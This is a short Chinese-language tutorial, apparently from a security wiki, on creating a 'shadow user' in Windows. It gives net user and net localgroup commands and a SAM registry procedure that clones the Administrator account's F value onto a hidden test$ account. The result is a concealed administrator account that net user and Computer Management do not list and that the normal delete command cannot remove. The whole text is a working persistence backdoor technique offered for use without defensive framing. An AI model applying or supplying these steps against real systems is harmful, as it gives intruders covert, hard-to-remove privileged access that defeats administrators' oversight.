## 影子用户

影子用户

影子用户顾名思义就是一个隐藏用户，只能通过注册表查看这个用户，其它方式是找不到这个用户的信息的

在用户名后面加一个$可以创建一个匿名用户，创建完毕后我们再把这个用户添加到administrator组


```bash
net user test$ test /add
net localgroup administrators test$ /add
```

可以看到net user是看不到我们创建的用户，但是计算机管理-用户和组中可以看到

![](images/security_wiki/15906328731148.png)

所以这时候我们就需要修改一下注册表，其键位置为：`HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users`

注意：SAM键值默认是只能system权限修改的，所以我们要修改一下SAM键的权限，给予administrator完全控制和读取的权限

![](images/security_wiki/15906328893048.png)


然后我们将administrator用户对应的项中的F值复制到test$对应xiang中的F值，然后保存

![](images/security_wiki/15906329017770.png)


然后我们将test$删除掉


```bash
net user test$ /del
```

然后再双击导出的注册表文件，然后我们再看一下

![](images/security_wiki/15906329211423.png)


net user和计算机管理-用户和组中都查看不到用户了，但是我们可以用`net user test$`查看用户信息

这个时候我们再用`net user test$ /del`是删除不掉这个用户的，只能通过注册表来删除。